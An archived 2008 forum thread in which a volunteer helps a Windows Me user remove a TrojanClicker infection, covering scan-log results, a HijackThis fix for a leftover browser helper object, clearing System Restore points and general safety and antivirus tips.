c:\_RESTORE\TEMP\A0000135.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\SVCHOST.0 a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0000261.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0000275.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\SVCHOST.1 a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0001260.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\SVCHOST.2 a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\SVCHOST.3 a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0001305.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\SVCHOST.4 a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0004316.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B
c:\_RESTORE\TEMP\A0004375.CPY probably unknown NewHeur_PE virus (unable to clean - deleted (after the next restart)) 00000000000000000000000000000000
c:\_RESTORE\TEMP\A0004376.CPY a variant of Win32/TrojanClicker.Delf.AKM trojan (unable to clean - deleted (after the next restart)) 2969295782143579C43BC20922657E3B


Thanks,
AlexA1

AlexA1
2008-11-16, 05:26
Shelf Life...

sorry one other note...
I could not locate the folder named altcmd... it doesn't display when I navigate to C:\Program Files... I do remember seeing this path show up on previous scans and maybe it was deleted.

shelf life
2008-11-17, 01:21
hi,

ok good. hjt log looks ok, spybot coming up clean also.
i dont see any reference to pcsecurity shield in the log. sometimes folders can get left behind after a uninstall. you can leave or delete the remaining folder in C:\Program files. looks like the on line scan took care of whats in your restore folder.

start HJT, click the "Scan" button. check the items below, close any open windows, then click "Fixed checked"

O2 - BHO: qs Class - {8A555E0E-6240-DD93-198D-45F571D4FD9B} - C:\PROGRAM FILES\ALTCMD\ALTCMD32.DLL (file missing)

you should get a antivirus app as soon as possible. some free editions:

http://www.clamwin.com/

http://www.avast.com/eng/download-avast-home.html

from there web site:
"avast! antivirus Home Edition is FREE to use but it is necessary to register before the end of the initial 60 day trial period"

Avira free:no support for ME

AVG free 8.0: no support for ME
------------------------------------
to make sure any malware that may have been backed up in your restore points is gone (although it looks like the online scan cleaned them out) you can turn off system restore and reboot which will delete all restore points, then turn it back on and reboot which will make a new clean restore point:

1. Click Start, Settings, and then click Control Panel.
2. Double-click the System icon. The System Properties dialog box appears.

NOTE: If the System icon is not visible, click "View all Control Panel options" to display it.

3. Click the Performance tab, and then click File System.
4. Click the Troubleshooting tab, and then check Disable System Restore.
5. Click OK. Click Yes, when you are prompted to restart Windows.
(deletes possibly infected restore points)
Once you have cleaned the virus or other problem from the computer, reenable System Restore by following these directions

To enable Windows Me System Restore:

1. Click Start, point to Settings, and then click Control Panel.
2. Double-click System, and then click the Performance tab.
3. Click File System, and then click the Troubleshooting tab.
4. Uncheck Disable System Restore.
5. Click OK. Click Yes, when you are prompted to restart Windows.
(new clean restore point)

if all is good:

Reducing Your Risk
The Short Version:

1) Keep your OS (http://update.microsoft.com/microsoftupdate/v6/default.aspx?ln=en-us),(Windows) browser (IE, FireFox) and other Software (http://secunia.com/vulnerability_scanning/online/) up to date to "patch" vulnerabilities.
2) Know what you are installing to your computer. Alot of software can come bundled with unwanted add-ons. Read the EULA before the software installs.
3) Install and keep them all updated: one antivirus and two or three anti-malware applications. If not updated they will soon be worthless.
4) Refrain from clicking on links or installing files you receive via E-Mail, IM, Chat Rooms or Social Sites, no matter how tempting or legitimate the message may seem. Are you sure of the source that sent them?
5) Don't click on ads/pop ups or offers from websites requesting that you install software to your computer. Do you trust the website?
6) Don't click on offers to "scan" your computer.
7) Set up and use limited accounts for everyday use, rather than administrator accounts.
8) Install a third party software firewall.
9) Consider using an alternate browser and E-mail client.
10) If your habits include: warez,cracks or p2p file sharing then you are much more likely to encounter malicious code. Do you trust the source?

longer version in link below. happy safe surfing out there.

AlexA1
2008-11-17, 01:53
Thanks very much Shelf Life,

You have been extremely helpful !!... and now my old machine is running well !!

I deleted the last BHO listing through HJT and it did remove it. I did the system restore disable-enable and I now have just today's good restore point.

Thanks for all the tips as well. I was able to download the AVG 7.5 version which does run on ME, so I'll try that one for a while.

Thanks again... You guys/galls are great service providers !!

Regards,
AlexA

AlexA1
2008-11-17, 02:00
Sorry... one final question... should I re-enable Tea Timer ? I had disabled this per instructions in the "before you post a HJT log" thread.

Thanks again,
AlexA

shelf life
2008-11-17, 02:34
hi,

your welcome. yes re-enable tea timer. Updates for AVG 7.5 appear to have ended for the free version. see link:

http://freeforum.avg.com/read.php?1,136697,backpage=,sv=


the new AVG 8.0, no support for ME.

look here under Operating systems:

http://free.avg.com/download-avg-anti-virus-free-edition#tba3

happy safe surfing